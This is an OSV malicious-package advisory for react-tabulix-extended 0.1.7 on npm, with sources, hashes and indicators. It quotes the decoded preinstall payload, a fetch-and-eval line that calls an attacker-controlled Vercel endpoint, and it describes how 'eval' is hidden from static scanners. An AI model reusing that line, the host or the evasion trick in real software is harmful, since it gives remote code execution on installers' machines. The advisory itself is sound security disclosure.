MAL-2026-11040

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-tabulix-extended/MAL-2026-11040.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-11040
Published
2026-07-22T13:00:59Z
Modified
2026-07-28T14:37:08.139439608Z
Summary
Malicious code in react-tabulix-extended (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9e8df06223a5059cf4892135df7f8144e8857ad8c4dbf66d358691597badc36a)

package.json declares preinstall: node./dist/index.d.js, which fires automatically on npm install. The script contains a base64-encoded payload that decodes to eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root1').then(r=>r.text())). The eval identifier is reconstructed from the char-code array [101,118,97,108] and invoked via globalThis[tag](text) to conceal the sink from static scanners. The result is arbitrary remote-code execution on the installer's machine at install time, with the payload served dynamically from an attacker-controlled Vercel endpoint so the executed code can change at any time.

Source: ossf-package-analysis (237a87c914ec4723f23c346fa62829c1e087c02bc181352880b9ea9a63420388)

The OpenSSF Package Analysis project identified 'react-tabulix-extended' @ 0.1.7 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-07-22T13:00:59Z",
            "versions": [
                "0.1.7"
            ],
            "source": "ossf-package-analysis",
            "import_time": "2026-07-24T00:45:56.143558023Z",
            "sha256": "237a87c914ec4723f23c346fa62829c1e087c02bc181352880b9ea9a63420388"
        },
        {
            "modified_time": "2026-07-28T13:36:57Z",
            "source": "amazon-inspector",
            "versions": [
                "0.1.7"
            ],
            "sha256": "9e8df06223a5059cf4892135df7f8144e8857ad8c4dbf66d358691597badc36a",
            "import_time": "2026-07-28T14:19:59.283856811Z",
            "id": "IN-MAL-2026-010923"
        }
    ]
}
References
Credits

Affected packages

npm / react-tabulix-extended

Package

Name
react-tabulix-extended
View open source insights on deps.dev
Purl
pkg:npm/react-tabulix-extended

Affected ranges

Affected versions

0.*
0.1.7

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-tabulix-extended/MAL-2026-11040.json"
indicators
{
    "evidence_files": [
        {
            "path": "dist/index.d.js",
            "sha256": "6a19681ca31fb7be2fea7d7e0644fb5c64249dfb64a1cf2ad189a11f4cc05292",
            "tlsh": "9df09e7e83d971b1e55418de06a89129b783d1f67e3c44b7f80f49d606a2c5583a11b0"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha1": "4255468e6125d49a30103dd5f0f2e8c3dfd83b76",
                "sha512_sri": "sha512-B4JWkdcqZ9WZSlIOFaKPC/SvwsNG4zMFiQE3ZUwUdIG1A7b/VoUkrCynza9Ja9xH+mdoJspgTjX5cQAktwZIDg=="
            },
            "filename": "react-tabulix-extended-0.1.7.tgz"
        }
    ]
}